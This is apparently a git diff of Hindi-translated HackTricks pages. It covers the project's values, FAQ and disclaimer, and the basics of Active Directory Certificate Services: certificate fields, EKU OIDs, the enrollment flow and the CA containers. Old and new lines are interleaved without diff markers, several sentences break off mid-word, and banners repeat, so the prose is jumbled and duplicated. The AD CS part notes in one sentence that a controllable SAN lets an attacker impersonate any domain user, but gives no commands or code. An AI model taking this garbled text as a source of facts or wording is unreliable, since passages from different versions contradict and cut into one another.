* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** **अनुसरण करें।**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs के माध्यम से** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को सबमिट करके।**
</details>
प्रोटोकॉल्स की एक निर्धार

107
welcome/hacktricks-values-and-faq.md
View file

@ -1,77 +1,92 @@
# HackTricks मूल्य और पूछे जाने वाले सवाल
# HackTricks मूल्य और faq
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स को हमारे पास भेजकर PR जमा करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में साझा करें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें PRs भेजकर** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.
</details>
## HackTricks मूल्य
{% hint style="success" %}
ये हैं **HackTricks परियोजना के मूल्य**:
ये हैं **HackTricks प्रोजेक्ट के मूल्य**:
* **सभी** इंटरनेट को **शिक्षात्मक हैकिंग संसाधनों का मुफ्त उपयोग** देना
* हैकिंग सीखने के बारे में है, और सीखना जितना संभव हो सके मुफ्त होना चाहिए।
* इस पुस्तक का उद्देश्य एक समग्र **शिक्षात्मक संसाधन** के रूप में सेवा करना
* समुदाय द्वारा प्रकाशित शानदार **हैकिंग** तकनीकों को **संग्रहित** करना और **मूल लेखकों को सभी स्रोतों का श्रेय** देना
* **हम अन्य लोगों से क्रेडिट नहीं चाहते हैं**, हम सभी के लिए ठंडे तरीके संग्रहित करना चाहते हैं।
* हम भी HackTricks में **अपने खुद के शोध** लिखते हैं
* कई मामलों में हम केवल तकनीक के महत्वपूर्ण हिस्सों का संक्षेप में HackTricks में लिखेंगे और पाठक को अधिक विवरण के लिए मूल पोस्ट का दौरा करने की प्रोत्साहना करेंगे
* हैकिंग तकनीकों को सभी के लिए **संगठित** करें ताकि इसे **अधिक पहुंचने योग्य** हो।
* HackTricks टीम ने लोगों को **तेजी से सीखने** के लिए केवल **सामग्री को संगठित करने** के लिए हजारों घंटे समर्पित किए हैं।
* सभी इंटरनेट को **शिक्षात्मक हैकिंग** संसाधनों तक **निःशुल्क** पहुंच प्रदान करें
* हैकिंग सीखने के बारे में है, और सीखना जितना संभव हो सके निःशुल्क होना चाहिए।
* इस पुस्तक का उद्देश्य एक व्यापक **शिक्षात्मक संसाधन** के रूप में कार्य करना है
* समुदाय द्वारा प्रकाशित शानदार **हैकिंग** तकनीकों को **संग्रहित** करें और **मूल** **लेखकों** को सभी **श्रेय** दें
* **हम दूसरे लोगों का श्रेय नहीं चाहते**, हम सिर्फ सभी के लिए अच्छी ट्रिक्स संग्रहित करना चाहते हैं।
* हम HackTricks में **अपने स्वयं के शोध भी लिखते हैं**
* कई मामलों में हम सिर्फ HackTricks में तकनीक के महत्वपूर्ण भागों का **सारांश लिखेंगे** और **पाठक को मूल पोस्ट पर जाने के लिए प्रोत्साहित करेंगे** अधिक जानकारी के लिए
* पुस्तक में सभी हैकिंग तकनीकों को **व्यवस्थित करें** ताकि यह **अधिक सुलभ हो**
* HackTricks टीम ने हजारों घंटे निःशुल्क समर्पित किए हैं **केवल सामग्री को व्यवस्थित करने के लिए** ताकि लोग **तेजी से सीख सकें**
{% endhint %}
<figure><img src="../.gitbook/assets/hack tricks gif.gif" alt="" width="375"><figcaption></figcaption></figure>
## HackTricks पूछे जाने वाले सवाल
## HackTricks faq
{% hint style="success" %}
* **इन संसाधनों के लिए आपको बहुत बहुत धन्यवाद, मैं आपको कैसे धन्यवाद कर सकता हूं?**
* **इन संसाधनों के लिए धन्यवाद, मैं आपको कैसे धन्यवाद दे सकता हूँ?**
{% endhint %}
आप HackTricks टीम को एक ट्वीट में धन्यवाद कहकर इन सभी सार्वजनिक संसाधनों को एकत्र करने के लिए धन्यवाद कह सकते हैं [**@hacktricks\_live**](https://twitter.com/hacktricks\_live) को उल्लेख करके।\
यदि आप विशेष रूप से आभारी हैं तो आप इस परियोजना का [**यहां सपोर्ट कर सकते हैं**](https://github.com/sponsors/carlospolop)।\
और गिटहब परियोजनाओं में **एक स्टार देना न भूलें**! (लिंक नीचे दिए गए हैं)।
आप HackTricks टीमों को इन सभी संसाधनों को एक साथ रखने के लिए सार्वजनिक रूप से एक ट्वीट में उल्लेख करके धन्यवाद दे सकते हैं [**@hacktricks\_live**](https://twitter.com/hacktricks\_live).\
यदि आप विशेष रूप से आभारी हैं तो आप [**यहाँ प्रोजेक्ट को प्रायोजित कर सकते हैं**](https://github.com/sponsors/carlospolop).\
और Github प्रोजेक्ट्स में **स्टार देना न भूलें!** (नीचे लिंक्स मिलेंगे).
{% hint style="success" %}
* **मैं परियोजना में योगदान कैसे कर सकता हूं?**
* **मैं प्रोजेक्ट में कैसे योगदान दे सकता हूँ?**
{% endhint %}
आप समुदाय के साथ **नई युक्तियों और ट्रिक्स साझा कर सकते हैं या पुस्तकों में मिलने वाली बग्स को ठीक
## लाइसेंस
आप **नई टिप्स और ट्रिक्स साझा कर सकते हैं समुदाय के साथ या पुस्तकों में पाए गए बग्स को ठीक कर सकते हैं** एक **Pull Request** भेजकर संबंधित Github पेजों पर:&#x20;
**कॉपीराइट © कार्लोस पोलोप 2023। जहां अन्यथा निर्दिष्ट नहीं किया गया है (पुस्तक में कॉपी की गई बाहरी जानकारी मूल लेखकों की संपत्ति है), कार्लोस पोलोप द्वारा लिखित** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **के पाठ का अधिकार** [**आवंटन-गैर-वाणिज्यिक 4.0 अंतर्राष्ट्रीय (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/) **के तहत लाइसेंस है।**\
**यदि आप इसे वाणिज्यिक उद्देश्यों के साथ उपयोग करना चाहते हैं, तो मुझसे संपर्क करें।**
* [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks)
* [https://github.com/carlospolop/hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)
## **अस्वीकरण**
Github प्रोजेक्ट्स में **स्टार देना न भूलें!**
{% hint style="success" %}
* **क्या मैं HackTricks से कुछ सामग्री को कॉपी करके अपने ब्लॉग में डाल सकता हूँ?**
{% endhint %}
हाँ, आप कर सकते हैं, लेकिन **विशिष्ट लिंक(स) का उल्लेख करना न भूलें** जहाँ से सामग्री ली गई थी।
{% hint style="warning" %}
* **क्या मैं अपने ब्लॉग में सारी HackTricks को कॉपी कर सकता हूँ?**
{% endhint %}
**मैं ऐसा नहीं चाहूंगा**। यह **किसी के लिए भी लाभकारी नहीं होगा** क्योंकि सारी **सामग्री पहले से ही सार्वजनिक रूप से उपलब्ध है** आधिकारिक HackTricks पुस्तकों में मुफ्त के लिए।
यदि आपको डर है कि यह गायब हो जाएगा, तो बस इसे Github में फोर्क करें या इसे डाउनलोड करें, जैसा कि मैंने कहा यह पहले से ही मुफ्त है।
{% hint style="warning" %}
* **आपके पास प्रायोजक क्यों हैं? क्या HackTricks पुस्तकें व्यावसायिक उद्देश्यों के लिए हैं?**
{% endhint %}
पहला **HackTricks** **मूल्य** दुनिया भर में **सभी** को **निःशुल्क** हैकिंग शिक्षात्मक संसाधन प्रदान करना है। HackTricks टीम ने इस सामग्री को प्रदान करने के लिए **हजारों घंटे समर्पित किए हैं**, फिर से, **निःशुल्क** के लिए।
यदि आप सोचते हैं कि HackTricks पुस्तकें **व्यावसायिक उद्देश्यों** के लिए बनाई गई हैं तो आप **पूरी तरह से गलत हैं**
हमारे पास प्रायोजक हैं क्योंकि, भले ही सारी सामग्री निःशुल्क है, हम समुदाय को हमारे काम की सराहना करने का विकल्प प्रदान करना चाहते हैं यदि वे चाहते हैं। इसलिए, हम लोगों को HackTricks को [**Github प्रायोजकों**](https://github.com/sponsors/carlospolop) के माध्यम से दान करने का विकल्प प्रदान करते हैं, और **प्रासंगिक साइबर सुरक्षा कंपनियों** को HackTricks को प्रायोजित करने और पुस्तक में कुछ विज्ञापन होने का विकल्प देते हैं, विज्ञापन हमेशा ऐसी जगहों पर रखे जाते हैं जहाँ वे **दिखाई देते हैं** लेकिन **सीखने की प्रक्रिया में व्यवधान नहीं डालते** अगर कोई सामग्री पर ध्यान केंद्रित करता है।
आपको HackTricks में HackTricks की तुलना में कम सामग्री वाले अन्य ब्लॉगों की तरह कष्टप्रद विज्ञापनों से भरा नहीं मिलेगा, क्योंकि HackTricks व्यावसायिक उद्देश्यों के लिए नहीं बनाया गया है।
{% hint style="danger" %}
यह पुस्तक, 'HackTricks,' केवल शैक्षिक और सूचनात्मक उद्देश्यों के लिए है। इस पुस्तक में दी गई सामग्री 'जैसी है', और लेखक और प्रकाशकों द्वारा इस पुस्तक में दी गई जानकारी, उत्पाद, सेवाएं या संबंधित ग्राफिक्स की पूर्णता, सटीकता, विश्वसनीयता, उपयुक्तता या उपलब्धता के संबंध में कोई प्रतिनिधि या वारंटी नहीं दी जाती है। इस जानकारी पर आपकी किसी भी आश्रय करने की आवश्यकता है, इसलिए आपकी जिम्मेदारी है।
लेखक और प्रकाशक किसी भी हानि या क्षति के लिए जिम्मेदार नहीं होंगे, जिसमें बिना सीमित या परिणामी हानि या क्षति, या डेटा या लाभ की कोई हानि या क्षति शामिल हो सकती है, जो इस पुस्तक के उपयोग से हो सकती है।
इसके अलावा, इस पुस्तक में वर्णित तकनीक और युक्तियाँ केवल शैक्षिक और सूचनात्मक उद्देश्यों के लिए प्रदान की जाती हैं, और इन्हें किसी भी अवैध या दुर्भाग्यपूर्ण गतिविधियों के लिए उपयोग नहीं किया जाना चाहिए। लेखक और प्रकाशक किसी भी अवैध या अनैतिक गतिविधियों का समर्थन नहीं करते हैं, और इस पुस्तक में दी गई जानकारी का उपयोग उपयोगकर्ता की अपनी जोखिम और विवेक पर छोड़ दिया जाता है।
उपयोगकर्ता केवल इस पुस्तक में दी गई जानकारी पर आधारित किसी भी कार्रवाई के लिए जिम्मेदार है, और इन तकनीकों या युक्तियों को लागू करने की कोशिश करने के लिए हमेशा पेशेवर सलाह और सहायता की तलाश करनी चाहिए।
इस पुस्तक का उपयोग करके, उपयोगकर्ता इस पुस्तक या इसमें दी गई किसी भी जानकारी के उपयोग से होने वाले किसी भी क्षति, हानि या नुकसान से छूटकारा पाने के लिए लेखक और प्रकाशकों को किसी भी और सभी दायित्व और जिम्मेदारी से मुक्त करने के लिए सहमत होता है।
* **मुझे क्या करना चाहिए अगर कोई HackTricks पृष्ठ मेरे ब्लॉग पोस्ट पर आधारित है लेकिन उसका उल्लेख नहीं है?**
{% endhint %}
<details>
**हमें बहुत खेद है। ऐसा नहीं होना चाहिए था**। कृपया, हमें Github issues, Twitter, Discord... के माध्यम से सूचित करें, HackTricks पृष्ठ का लिंक जिसमें सामग्री है और आपके ब्लॉग का लिंक और **हम इसे जांचेंगे और जल्द से जल्द जोड़ देंगे**
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
{% hint style="danger" %}
* **मुझे क्या करना चाहिए अगर HackTricks में मेरे ब्लॉग की सामग्री है और मैं नहीं चाहता कि वह वहाँ हो?**
{% endhint %}
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित करना** चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें।**
* **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
</details>
किसी भी मामले म

144
windows-hardening/active-directory-methodology/ad-certificates.md
View file

@ -2,111 +2,61 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** **अनुसरण** करें।**
* **हैकिंग ट्रिक्स साझा करें और** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का पालन करें**.
* **HackTricks के लिए अपनी हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.
</details>
## मूलभूत जानकारी
## मूल जानकारी
### प्रमाणपत्र के भाग
* **विषय** - प्रमाणपत्र के मालिक।
* **सार्वजनिक कुंजी** - विषय को एक अलग स्थान पर संग्रहीत निजी कुंजी से जोड़ता है।
* **NotBefore और NotAfter तिथियाँ** - प्रमाणपत्र की मान्यता की अवधि को परिभाषित करती हैं।
* **धाराक क्रमांक** - CA द्वारा प्रमाणपत्र के लिए निर्धारित पहचानकर्ता।
* **जारक** - प्रमाणपत्र को जारी करने वाले को पहचानता है (सामान्यतः CA होता है)।
* **SubjectAlternativeName** - विषय द्वारा जाने जाने वाले एक या अधिक वैकल्पिक नामों को परिभाषित करता है। (_नीचे देखें_)
* **मूलभूत सीमाएं** - प्रमाणपत्र एक CA है या एक अंत इकाई है, और प्रमाणपत्र का उपयोग करते समय कोई सीमाएं हैं या नहीं, इसे पहचानता है।
* **विस्तृत कुंजी उपयोग (EKUs)** - वस्त्र के उपयोग को वर्णन करने वाले वस्त्र चिन्हितकरण (OIDs)। माइक्रोसॉफ्ट भाषा में विस्तृत कुंजी उपयोग के रूप में भी जाना जाता है। सामान्य EKU OIDs में शामिल हैं:
* कोड साइनिंग (OID 1.3.6.1.5.5.7.3.3) - प्रमाणपत्र को कोड साइन करने के लिए है।
* फ़ाइल सिस्टम एन्क्रिप्शन (OID 1.3.6.1.4.1.311.10.3.4) - प्रमाणपत्र फ़ाइल सिस्टम को एन्क्रिप्ट करने के लिए है।
* सुरक्षित ईमेल (1.3.6.1.5.5.7.3.4) - प्रमाणपत्र ईमेल को एन्क्रिप्ट करने के लिए है।
* क्लाइंट प्रमाणीकरण (OID 1.3.6.1.5.5.7.3.2) - प्रमाणपत्र किसी अन्य सर्वर (जैसे, AD के लिए) के प्रमाणीकरण के लिए है।
* स्मार्ट कार्ड लॉगऑन (OID 1.3.6.1.4.1.311.20.2.2) - प्रमाणपत्र को स्मार्ट कार्ड प्रमाणीकरण में उपयोग करने के लिए है।
* सर्वर प्रमाणीकरण (OID 1.3.6.1.5.5.7.3.1) - प्रमाणपत्र सर्वरों की पहचान के लिए है (जैसे, HTTPS प्रमाणपत्र)।
* **हस्ताक्षर एल्गोरिदम** - प्रमाणपत्र के हस्ताक्षर करने के लिए उपयोग किए जाने वाले एल्गोरिदम को निर्दिष्ट करता है।
* **हस्ताक्षर** - प्रमाणपत्र के शरीर के हस्ताक्षर को जारी करता है, जिसे जारक (उदाहरण के लिए
* **AIA** (Authority Information Access) कंटेनर में आंतरिक और क्रॉस सीए के AD ऑब्जेक्ट्स होते हैं। **आंतरिक सीए रूट सीए के "बच्चे" होते हैं** PKI ट्री हाइयरार्की में; इस प्रकार, यह कंटेनर प्रमाणित पत्र श्रृंखलाओं की **प्रमाणित पत्र श्रृंखलाओं की प्रमाणित करने में सहायता करने के लिए मौजूद होता है**। प्रमाणित प्राधिकरणों के कंटेनर की तरह, प्रत्येक **सीए को एडी ऑब्जेक्ट के रूप में प्रतिष्ठित किया जाता है** जहां objectClass विशेषता certificationAuthority पर सेट की जाती है और **`cACertificate`** संपत्ति में **सीए के प्रमाण पत्र** के **बाइट्स** होते हैं। ये सीए विंडोज मशीन पर हर बार Intermediate Certification Authorities प्रमाणित पत्र संग्रह में प्रसारित होते हैं।
* **Subject** - प्रमाणपत्र का मालिक।
* **Public Key** - Subject को अलग से संग्रहीत प्राइवेट की से जोड़ता है।
* **NotBefore और NotAfter तिथियां** - प्रमाणपत्र की वैधता की अवधि निर्धारित करती हैं।
* **Serial Number** - CA द्वारा असाइन किया गया प्रमाणपत्र के लिए एक पहचानकर्ता।
* **Issuer** - यह दर्शाता है कि प्रमाणपत्र किसने जारी किया है (आमतौर पर एक CA)।
* **SubjectAlternativeName** - Subject के एक या अधिक वैकल्पिक नामों को परिभाषित करता है। (_नीचे देखें_)
* **Basic Constraints** - यह पहचानता है कि प्रमाणपत्र एक CA है या एक अंतिम इकाई, और प्रमाणपत्र का उपयोग करते समय कोई प्रतिबंध हैं या नहीं।
* **Extended Key Usages (EKUs)** - Object identifiers (OIDs) जो वर्णन करते हैं **प्रमाणपत्र का उपयोग कैसे किया जाएगा**। Microsoft शब्दावली में इसे Enhanced Key Usage भी कहा जाता है। आम EKU OIDs में शामिल हैं:
* Code Signing (OID 1.3.6.1.5.5.7.3.3) - प्रमाणपत्र एक्जीक्यूटेबल कोड के हस्ताक्षर के लिए है।
* Encrypting File System (OID 1.3.6.1.4.1.311.10.3.4) - प्रमाणपत्र फाइल सिस्टम को एन्क्रिप्ट करने के लिए है।
* Secure Email (1.3.6.1.5.5.7.3.4) - प्रमाणपत्र ईमेल को एन्क्रिप्ट करने के लिए है।
* Client Authentication (OID 1.3.6.1.5.5.7.3.2) - प्रमाणपत्र दूसरे सर्वर के लिए प्रमाणीकरण के लिए है (उदाहरण के लिए, AD के लिए)।
* Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2) - प्रमाणपत्र स्मार्ट कार्ड प्रमाणीकरण में उपयोग के लिए है।
* Server Authentication (OID 1.3.6.1.5.5.7.3.1) - प्रमाणपत्र सर्वरों की पहचान के लिए है (उदाहरण के लिए, HTTPS प्रमाणपत्र)।
* **Signature Algorithm** - प्रमाणपत्र को हस्ताक्षर करने के लिए उपयोग किए गए एल्गोरिदम को निर्दिष्ट करता है।
* **Signature** - प्रमाणपत्रों के शरीर का हस्ताक्षर जो जारीकर्ता की (उदाहरण के लिए, एक CA की) प्राइवेट की का उपयोग करके बनाया गया है।
### क्लाइंट प्रमाण पत्र अनुरोध फ्लो
#### Subject Alternative Names
<figure><img src="../../.gitbook/assets/image (5) (2) (2).png" alt=""><figcaption></figcaption></figure>
**Subject Alternative Name** (SAN) एक X.509v3 एक्सटेंशन है। यह **अतिरिक्त पहचानों** को **प्रमाणपत्र** से जोड़ने की अनुमति देता है। उदाहरण के लिए, यदि एक वेब सर्वर **कई डोमेनों के लिए सामग्री** होस्ट करता है, तो **प्रत्येक** लागू **डोमेन** को **SAN** में **शामिल किया जा सकता है** ताकि वेब सर्वर को केवल एक HTTPS प्रमाणपत्र की आवश्यकता हो।
यह AD CS से प्रमाण पत्र प्राप्त करने की प्रक्रिया है। उच्च स्तर पर, पंजीकरण के दौरान क्लाइंट पहले **एंटरप्राइज सीए ढूंढते हैं** जो पहले ही चर्चित पंजीकरण सेवाओं के **ऑब्जेक्ट्स पर आधारित होते हैं**।
डिफ़ॉल्ट रूप से, प्रमाणपत्र-आधारित प्रमाणीकरण के दौरान, AD प्रमाणपत्रों को उपयोगकर्ता खातों से मैप करता है जो SAN में निर्दिष्ट एक UPN के आधार पर होता है। यदि एक हमलावर **एक अनियंत्रित SAN को निर्दिष्ट कर सकता है** जब एक प्रमाणपत्र का अनुरोध करते हैं जिसमें एक **EKU क्लाइंट प्रमाणीकरण को सक्षम करता है**, और CA एक प्रमाणपत्र बनाता है और हमलावर द्वारा प्रदान किए गए SAN का उपयोग करके हस्ताक्षर करता है, तो **हमलावर डोमेन में किसी भी उपयोगकर्ता बन सकता है**।
1. फिर क्लाइंट एक **सार्वजनिक-निजी कुंजी जोड़ी** उत्पन्न करते हैं और
2. प्रमाण पत्र के विषय और **प्रमाण पत्र टेम्पलेट नाम** जैसी अन्य विवरणों के साथ एक **प्रमाण पत्र साइनिंग अनुरोध (CSR)** संदेश में सार्वजनिक कुंजी रखते हैं। फिर क्लाइंट अपनी निजी कुंजी के साथ CSR को **साइन करते हैं** और CSR को एक एंटरप्राइज सीए सर्वर को भेजते हैं।
3. **सीए** सर्वर यह जांचता है कि क्लाइंट **प्रमाण पत्र अनुरोध कर सकता है** या नहीं। यदि हां, तो यह निर्धारित करता है कि क्या वह प्रमाण पत्र जारी करेगा या नहीं, जिसे CSR में निर्दिष्ट किया गया है। सीए यह जांचेगा कि क्या प्रमाण पत्र टेम्पलेट एडी ऑब्जेक्ट की **अनुमतियाँ** प्रमाणित करती हैं कि प्रमाणित करने वाले खाते को **प्रमाण पत्र प्राप्त करने की अनुमति है** या नहीं।
4. यदि हां, तो **सीए प्रमाण पत्र उत्पन्न** करता है जो प्रमाण पत्र टेम्पलेट (जैसे EKUs, गणितीय सेटिंग्स और जारी करने की आवश्यकताएं) द्वारा परिभाषित "नक़्शा" सेटिंग्स का उपयोग करते हुए और यदि प्रमाण पत्र के टेम्पलेट सेटिंग्स द्वारा अनुमति है, तो CSR में दिए गए अन्य जानकारी का उपयोग करते हुए प्रमाण पत्र को **साइन करता है**। सीए अपनी निजी कुंजी का उपयोग करके प्रमाण पत्र को साइन करता है और फिर इसे क्लाइंट को वापस भेजता है।
### CAs
### प्रमाण पत्र टेम्पलेट
AD CS चार स्थानों में AD वन द्वारा विश्वास किए गए CA प्रमाणपत्रों को परिभाषित करता है `CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=<com>` कंटेनर के नीचे, प्रत्येक उनके उद्देश्य से भिन्न होता है:
AD CS प्रमाण पत्र टेम्पलेट को AD ऑब्जेक्ट्स के रूप में संग्रहीत करता है जिनका **objectClass** **`pKICertificateTemplate`** होता है और निम्नलिखित कंटेनर में स्थित होता है:
* **Certification Authorities** कंटेनर **विश्वसनीय रूट CA प्रमाणपत्रों** को परिभाषित करता है। ये CAs PKI ट्री हायरार्की के **शीर्ष पर हैं** और AD CS वातावरणों में विश्वास का आधार हैं। प्रत्येक CA को कंटेनर के अंदर एक AD ऑब्जेक्ट के रूप में प्रतिनिधित्व किया जाता है जहां **objectClass** को **`certificationAuthority`** पर सेट किया गया है और **`cACertificate`** प्रॉपर्टी में **CA के प्रमाणपत्र** के **बाइट्स** होते हैं। Windows इन CA प्रमाणपत्रों को **प्रत्येक Windows मशीन** पर Trusted Root Certification Authorities प्रमाणपत्र स्टोर में प्रसारित करता है। AD के लिए एक प्रमाणपत्र को **विश्वसनीय** मानने के लिए, प्रमाणपत्र की ट्रस्ट **चेन** अंततः **इस कंटेनर में परिभाषित एक रूट CA के साथ समाप्त** होनी चाहिए।
* **Enrolment Services** कंटेनर प्रत्येक **Enterprise CA** को परिभाषित करता है (यानी, AD CS में बनाए गए CAs जिसमें Enterprise CA भूमिका सक्षम है)। प्रत्येक Enterprise CA के पास निम्नलिखित विशेषताओं के साथ एक AD ऑब्जेक्ट होता है:
* एक **objectClass** विशेषता **`pKIEnrollmentService`** के लिए
* एक **`cACertificate`** विशेषता जिसमें **CA के प्रमाणपत्र के बाइट्स** होते हैं
* एक **`dNSHostName`** प्रॉपर्टी जो **CA के DNS होस्ट को सेट करती है**
